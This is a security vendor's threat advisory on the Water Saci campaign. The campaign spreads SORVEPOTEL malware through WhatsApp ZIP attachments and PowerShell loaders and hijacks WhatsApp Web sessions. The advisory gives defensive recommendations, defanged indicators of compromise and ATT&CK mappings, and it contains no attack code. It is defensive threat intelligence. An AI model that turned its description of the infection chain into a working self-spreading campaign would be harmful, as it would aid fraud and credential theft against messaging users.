Threat Advisories:
Redis Under Siege: RediShell Flaw Opens Door to Remote Code Execution CVE-2025-61882: Oracle EBS Zero-Day Actively Exploited in the Wild Water Saci: Brazil’s WhatsApp-Borne Malware Storm Confucius Hackers Spy on Critical Sectors Using AnonDoor FunkLocker: Emerging AI-Assisted Ransomware Olymp Loader: Modular Malware Built for Rapid Exploitation VMware Aria and Tools Vulnerabilities Fixed Amid Ongoing Exploitation DarkCloud Rising: Spear-Phishing Campaign Targets Manufacturing Sector Active Zero-Day Exploitation on Cisco ASA and FTD Devices BRICKSTORM Malware Quietly Builds the Perfect Hideout in US Networks September 2025 Linux Patch Roundup COLDRIVER’s ClickFix Campaign Targets Civil Voices Critical Cisco SNMP Flaw Exploited: Root Access at Risk DeerStealer the $200 Doorway to Your Digital Secrets Operation Rewrite: How BadIIS Rewired the Web for SEO Poisoning Atomic Stealer Targeting Mac Users via Malicious GitHub Page Subtle Snail’s Silent Espionage Across Europe Gamaredon Tools Revive Turla’s Kazuar Backdoor to Target Ukraine Google Races to Patch Chrome’s Sixth Zero-Day CVE-2025-10585 SilentSync RAT Hides in Plain Sight on PyPI
🎧 Hive Force Labs: October First Threat Research
👥 Play Count: Loading...
Partner Program
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure PlatformUni5 Xposure leverages exposure assessment and adversarial exposure validation to deliver a unified view of your cyber risks and all actionable pathways to resolve them. Powered by:
IntegrationsOut of box integrations available with a comprehensive set of Security and IT operations tools in your organisation.
HiveForce LabsThe in-house intelligence that enables customers to identify and address immediate cyber risks and potential threats with precision, clear insights, and swift action.
Hive Pro’s ComparisonSave Cost , Reduce Complexity and Increase Security by Augmenting and Replacing your existing Vulnerability Management platform
Hive Pro vs Rapid7
Hive Pro vs Tenable
Hive Pro vs Qualys
Hive Pro vs Nucleus Security
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Case Studies
Whitepapers
Press Releases
connect
Webinars & Videos
Blog
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoThreat Digest - Subscribe
Platform
Platform
Comprehensive Threat Exposure Management Platform
Uni5 Xposure Platform
IntegrationsOut of box integrations available with a comprehensive set of Security and IT operations tools in your organisation.
HiveForce LabsThe in-house intelligence that enables customers to identify and address immediate cyber risks and potential threats with precision, clear insights, and swift action.
Hive Pro’s Comparison
Hive Pro vs Rapid7
Hive Pro vs Tenable
Hive Pro vs Qualys
Hive Pro vs Nucleus Security
Solutions
Solutions
By Use Case
Total Attack Surface Management
Multi-Environment Security Scanners
Complete Exposure Assessment
Comprehensive Security Intelligence
Vulnerability & Threat Prioritization
Adversarial Exposure Validation
By Role
CISO
Vulnerability Management
Security Operations
DevOps
Industry
Industry
Telecommunications
Healthcare
Financial Services
Government & Public Sector
Retail & E-Commerce
Educational Institutions
Resources
Resources
Advisories & Digests
Threat Advisories
Threat Digests
Content Library
learn
Blog
Case Studies
Whitepapers
Press Releases
connect
Webinars & Videos
Blog
Company
Company
About Us
Careers
Our Leadership
Contact Us
Book a DemoThreat Digest - Subscribe

Water Saci: Brazil’s WhatsApp-Borne Malware Storm

Amber | Attack Report
Download PDF

Water Saci: Brazil’s WhatsApp-Borne Malware Storm

Summary

The Water Saci campaign is an aggressive, Brazil-focused malware operation that leverages WhatsApp to distribute the SORVEPOTEL malware targeting Windows users. First identified in 2025, the campaign primarily impacts financial institutions and cryptocurrency exchanges, weaponizing social engineering and automation to achieve mass propagation.

Victims receive malicious ZIP attachments through WhatsApp messages disguised as legitimate documents. Once opened, the malware executes PowerShell commands that download additional payloads directly into memory. These payloads enable in-memory execution, banking credential theft, and automated propagation, allowing SORVEPOTEL to hijack active WhatsApp Web sessions and send infected files to all contacts.

The campaign demonstrates a highly adaptive, multi-stage attack architecture combining reflective DLL loading, in-memory shellcode execution, and Selenium-based browser automation, making Water Saci one of the most sophisticated socially engineered malware outbreaks seen in Latin America.

Attack Details

Water Saci diverges from typical phishing and ransomware campaigns by exploiting WhatsApp’s communication trust model as its core infection vector. The operation centers around SORVEPOTEL, a self-propagating Windows malware engineered for speed and persistence rather than direct financial gain.

Attackers send deceptive messages in Portuguese containing ZIP files disguised as invoices or receipts. When victims extract and execute these files, malicious LNK shortcuts launch hidden PowerShell scripts that connect to remote servers, download additional components, and execute them entirely in memory using Base64 encoding and obfuscation.

Once established, SORVEPOTEL performs several key functions:

  • Propagation: Automatically forwards malicious ZIPs to all WhatsApp contacts and groups.

  • Persistence: Copies itself into the Windows Startup directory to relaunch after reboot.

  • Stealth: Executes payloads via in-memory reflection and disables sandbox detection checks.

  • Automation: Uses Selenium and Chromedriver to hijack WhatsApp Web sessions and autonomously send infected messages.

  • Surveillance: Monitors browser activity, potentially enabling future modules for credential theft or ransomware deployment.

The malware’s architecture includes multiple stages — PowerShell loader → .NET DLL payload → encrypted shellcode → automation module — demonstrating a scalable, modular infection chain designed for continued adaptation. Its regional targeting logic ensures activation only within Brazilian locales, highlighting a geo-fenced, nation-specific cyber threat.

Recommendations

  • Be Cautious with Unexpected WhatsApp Messages: Avoid opening ZIP attachments or clicking on links, even from known contacts, as compromised accounts are commonly exploited for distribution.

  • Separate Work and Personal Communication: Avoid using personal messaging apps like WhatsApp for professional communication; enforce BYOD and messaging security policies.

  • Keep Systems Updated: Regularly patch Windows OS, browsers, and security tools to minimize vulnerabilities exploited by PowerShell-based malware.

  • Disable Auto-Downloads and Previews: Configure WhatsApp Web and browsers to block automatic media or file downloads to prevent drive-by infections.

  • Enhance Endpoint Security: Deploy Next-Gen Antivirus (NGAV) and EDR tools leveraging behavioral detection and machine learning to identify PowerShell or in-memory threats.

Indicators of Compromise (IoCs)

SHA256 Hashes

  • 2150f38c436eabebd3a93b3ace1064315153c882ce763991b6d0fb798766e0db

  • bd62148637152396b757c8b106d5a62982bce9df12f0a6030dda9138e44e7328

  • 2d83c4d620866f4ae647ed6a70113686bb7b80b1a7bbdcf544fd0ffec105c4a6

  • 3b68826e4a1d95b1dd58b3bf1095750f31a72d8bddd1dbb35e6547ac0cf4769b

  • 1a0af26749f5bc21732c53fc12f3a148215c8221cbeffe920411656f1ffe7500

  • 441a2ad553d166df3cd0ea02482f4b8370e8f9618753e1937a251a6318cb8eba

  • dcdde53c50aef9531c9f59f341a4e2d59796cdd94a973f2c2a464b2cafed41f5

  • c50b6ff360e5614d91f80a5e2d616a9d0d1a9984751bf251f065426a63dac0b5

URL

  • hxxps[:]//sorvetenopote[.]com/api/itbi/Q77xivT4udoXayYELTwehMD666ovP6DZ

Domains

  • expansiveuser[.]com

  • imobiliariaricardoparanhos[.]com

  • sorvetenopote[.]com

  • zapgrande[.]com

  • expahnsiveuser[.]com

  • sorvetenopoate[.]com

  • casadecampoamazonas[.]com

  • bravexolutions[.]com

  • adoblesecuryt[.]com

  • saogeraldoshoping[.]com

IPv4 Addresses

  • 23[.]227[.]203[.]179

  • 140[.]99[.]164[.]81

  • 92[.]246[.]130[.]15

MITRE ATT&CK TTPs

  • TA0001 Initial AccessT1566, T1566.003 (Spearphishing via Service)

  • TA0002 ExecutionT1059, T1059.001 (PowerShell), T1204.001 (Malicious Link), T1204.002 (Malicious File)

  • TA0003 PersistenceT1547, T1547.001 (Registry Run Keys / Startup Folder)

  • TA0005 Defense EvasionT1027 (Obfuscated Files), T1140 (Deobfuscate/Decode), T1036 (Masquerading)

  • TA0007 DiscoveryT1057 (Process Discovery), T1082 (System Information Discovery), T1614 (System Location Discovery)

  • TA0009 CollectionT1113 (Screen Capture), T1056, T1056.001 (Keylogging)

  • TA0010 ExfiltrationT1041 (Exfiltration Over C2 Channel)

  • TA0011 Command and ControlT1071, T1071.001 (Web Protocols)

  • TA0042 Resource DevelopmentT1586 (Compromise Accounts)

References

What’s new on HivePro

Get through updates and upcoming events, and more directly in your inbox